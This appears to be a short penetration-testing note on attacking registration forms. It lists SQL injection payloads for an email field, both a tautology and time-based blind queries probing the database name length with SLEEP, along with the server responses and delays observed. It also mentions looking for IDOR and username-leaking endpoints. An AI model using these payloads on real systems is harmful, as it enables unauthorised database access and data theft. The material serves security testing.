Registration
Throw Way Email Services
Use throwaway email to create a temporary email: ○https://mail.protonmail.com
Check the Registration Process and try to find Idor or endpoint that leaks usernames/emails# SQLI in Email Field
{"email":"asd'a@a.com"} --> Not Valid
{"email":"asd'or'1'='1@a.com" } --> valid
{"email":"a'-IF(LENGTH(database())>9,SLEE P(7),0)or'1'='1@a.com"} --> Not Valid
{"email":"a'-IF(LENGTH(database())>9,SLEE P(7),0)or'1'='1@a.com"} -> Valid --> Delay: 7,854 milis
{"email":"\\"a'-IF(LENGTH(database())=10,SLEEP(7),0)or'1'='1\\"@a.com"} --> {"code":0,"status":200,"mes sage":"Berhasil"} --> Valid --> Delay 8,696 milis
{"email":"\\"a"-IF(LENGTH(database())=11,SLEEP(7),0)or'1'='1\\"@a.com"} ---> {"code":0,"status":200,"mes sage":"Berhasil"} ---> Valid --> No delay
# Resources
- <https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17>Email Verification Feature
OTP Bypass
Last updated
Was this helpful?